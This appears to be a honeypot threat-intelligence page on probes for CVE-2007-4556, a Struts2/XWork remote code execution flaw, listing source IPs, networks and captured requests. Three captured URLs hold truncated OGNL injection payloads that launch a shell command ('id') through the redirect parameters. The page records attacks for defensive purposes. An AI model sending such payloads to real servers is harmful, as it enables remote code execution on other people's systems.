CVE-2007-4556: OpenSymphony XWork/Apache Struts2 - Remote Code Execution
HoneyLabs honeypots recorded 26 probes matching CVE-2007-4556 from 6 distinct source IP addresses in the last 7 days. Severity is rated medium.
Request paths that identify it
- /login.action
Addresses probing it
| Source IP | Probes | Network | Country |
|---|---|---|---|
| 93.123.109.214 | 21 | Techoff Srv Limited | Bulgaria |
| 157.230.19.140 | 1 | DigitalOcean, LLC | Germany |
| 209.97.180.8 | 1 | DigitalOcean, LLC | United Kingdom |
| 147.182.149.75 | 1 | DigitalOcean, LLC | Canada |
| 165.227.173.41 | 1 | DigitalOcean, LLC | Germany |
| 146.190.103.103 | 1 | DigitalOcean, LLC | Singapore |
Networks it comes from
| ASN | Organisation | Probes | Source IPs |
|---|---|---|---|
| AS48090 | Techoff Srv Limited | 21 | 1 |
| AS14061 | DigitalOcean, LLC | 5 | 5 |
Captured requests
- /login.action
- /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20…
- /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%…
- /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%…
CVE report
CVE report
Open a specific CVE from the CVE tracker.